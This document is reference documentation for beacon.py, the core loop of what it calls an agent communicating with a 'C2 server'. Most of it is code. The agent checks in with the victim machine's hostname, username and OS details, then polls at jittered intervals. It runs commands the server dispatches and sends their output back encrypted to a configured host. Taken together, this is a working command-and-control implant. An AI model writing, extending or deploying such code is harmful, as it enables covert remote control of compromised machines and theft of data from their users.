Overview
The beacon.py module implements the agent’s core communication loop. It handles server check-in, task polling, command execution, and exponential backoff retry logic.
Module Location
Classes
BackoffManager
Manages exponential backoff state for retry logic.
Attributes
_SEQUENCE = [1, 2, 4, 8, 16, 32, 60] # delay steps in seconds, capped at 60
attempts: int # Current retry attempt count
Methods
__init__()
Initializes a new BackoffManager with zero attempts.
def __init__(self):
self.attempts = 0
compute_delay() -> float
Returns the delay for the current attempt, capped at 60 seconds.
Returns:
Example:
backoff = BackoffManager()
print(backoff.compute_delay()) # 1.0 (first attempt)
backoff.attempts = 3
print(backoff.compute_delay()) # 8.0 (fourth attempt)
backoff.attempts = 10
print(backoff.compute_delay()) # 60.0 (capped)
reset() -> None
Resets attempt counter after a successful operation.
backoff.reset()
assert backoff.attempts == 0
BeaconLoop
Implements the agent’s main communication loop with the C2 server.
Attributes
_session_id: str | None # Assigned by server after CHECKIN
_key: bytes # Session encryption key
_backoff: BackoffManager # Retry backoff manager
_profile: TrafficProfile # Loaded traffic profile
_sleep_fn: Callable # Jitter strategy function
Methods
__init__()
Initializes the beacon loop with crypto keys and traffic profile.
def __init__(self):
self._session_id = None
self._key = get_session_key()
self._backoff = BackoffManager()
self._profile = load_active_profile()
self._sleep_fn = get_sleep_fn(self._profile.jitter_strategy)
run() -> None
Runs the full beacon loop — check-in then poll/execute until MSG_TERMINATE.
Execution Phases:
Phase 1: Initial Check-in
while True:
try:
self._checkin()
self._reset_backoff()
break
except TransportError as e:
logger.warning('checkin failed', extra={'reason': str(e)})
self._backoff_sleep(reason=str(e))
Retries check-in with exponential backoff until successful.
Phase 2: Main Beacon Loop
while True:
# Compute jittered sleep interval
sleep_s = self._sleep_fn(config.BEACON_INTERVAL_S, self._profile.jitter_pct)
# Sleep then send TASK_PULL
time.sleep(sleep_s)
response = _send(pull_payload, self._key)
# Handle response
if msg_type == MSG_TASK_DISPATCH:
self._handle_task_dispatch(response)
elif msg_type == MSG_TERMINATE:
sys.exit(0)
Error Handling:
TransportError: Triggers exponential backoff, continues loop
- Other exceptions: Logged, backoff reset, continues loop
_checkin() -> None
Internal method - sends CHECKIN and stores the session_id assigned by server.
Raises:
TransportError: If response missing session_id
payload = _build_checkin_payload()
response = _send(payload, self._key)
self._session_id = (
response.get('session_id') or
response.get('payload', {}).get('session_id')
)
if not self._session_id:
raise TransportError('CHECKIN response missing session_id')
After successful check-in, the logger is updated with the session ID:
logger = update_session(logger, self._session_id)
_handle_task_dispatch(response: dict) -> None
Internal method - executes dispatched task and sends result back to server.
Parameters:
response (dict): Server response containing task dispatch
Extracted Fields:
inner = response.get('payload', {})
task_id = inner.get('task_id', '')
command = inner.get('command', '')
args = inner.get('args', [])
timeout_s = inner.get('timeout_s', 30)
Execution Flow:
result = execute(task_id, command, args, timeout_s)
result_payload = mf.build_task_result(
session_id = self._session_id,
task_id = result.task_id,
stdout = result.stdout,
stderr = result.stderr,
exit_code = result.exit_code,
duration_ms = result.duration_ms,
)
_send(result_payload, self._key)
_backoff_sleep(reason: str = '') -> None
Internal method - sleeps for current backoff delay and increments attempt count.
Parameters:
reason (str): Optional reason for backoff (for logging)
delay = self._backoff.compute_delay()
logger.warning('backing off before retry', extra={
'backoff_s': delay,
'attempt': self._backoff.attempts + 1,
'reason': reason,
})
time.sleep(delay)
self._backoff.attempts = min(
self._backoff.attempts + 1,
len(BackoffManager._SEQUENCE) - 1,
)
_reset_backoff() -> None
Internal method - resets backoff attempt counter after successful operation.
Helper Functions
_build_checkin_payload() -> dict
Builds CHECKIN payload from current machine info.
Returns:
dict: CHECKIN message payload
return mf.build_checkin(
hostname = platform.node(),
username = getpass.getuser(),
os_info = f'{platform.system()} {platform.release()} {platform.version()}',
agent_ver = AGENT_VERSION,
jitter_pct = config.JITTER_PCT,
)
_send(payload: dict, key: bytes) -> dict
Packs, sends, and unpacks a beacon message.
Parameters:
payload (dict): Message payload
key (bytes): Encryption key
Returns:
dict: Server response payload
packed = mf.pack(payload, key)
raw_resp = send_beacon(BEACON_ENDPOINT, packed)
return mf.unpack(raw_resp, key)
Constants
BEACON_ENDPOINT = f'https://{config.SERVER_HOST}:{config.SERVER_PORT}/beacon'
AGENT_VERSION = '1.0.0'
Message Types
The beacon loop handles three message types:
| Type | Action |
|---|
MSG_TASK_DISPATCH | Execute task via _handle_task_dispatch() |
MSG_TERMINATE | Log shutdown message and exit with code 0 |
| Other | Log “no task” and continue loop |
Backoff Sequence
Retry delays in seconds:
Attempt 1: 1s
Attempt 2: 2s
Attempt 3: 4s
Attempt 4: 8s
Attempt 5: 16s
Attempt 6: 32s
Attempt 7+: 60s (capped)
Usage Example
from agent.beacon import BeaconLoop
# Initialize and run beacon loop
loop = BeaconLoop()
loop.run() # Runs until MSG_TERMINATE received
Logging
The beacon loop emits structured logs for all operations:
Check-in:
logger.info('checkin complete', extra={
'session_id': self._session_id,
'hostname': platform.node(),
})
Beacon sent:
logger.info('beacon sent', extra={
'session_id': self._session_id,
'interval_s': round(sleep_s, 2),
'jitter_s': jitter_s,
'payload_size_bytes': len(packed),
})
Task executed:
logger.info('task executed', extra={
'task_id': task_id,
'exit_code': result.exit_code,
'duration_ms': result.duration_ms,
})
Backoff retry:
logger.warning('backing off before retry', extra={
'backoff_s': delay,
'attempt': self._backoff.attempts + 1,
'reason': reason,
'session_id': self._session_id,
})
Error Recovery
Transport Errors
Network failures trigger exponential backoff:
except TransportError as e:
logger.warning('transport error', extra={
'reason': str(e),
'session_id': self._session_id,
})
self._backoff_sleep(reason=str(e))
Unexpected Errors
Other exceptions are logged but don’t stop the loop:
except Exception as e:
logger.error('unexpected error in beacon loop', extra={
'reason': str(e),
'traceback': traceback.format_exc(),
'session_id': self._session_id,
})
self._reset_backoff()
Security Features
- End-to-End Encryption: All messages encrypted with
_key
- Session Isolation: Each agent gets unique
session_id
- Graceful Shutdown:
MSG_TERMINATE cleanly exits the loop
- Error Recovery: Network failures don’t crash the agent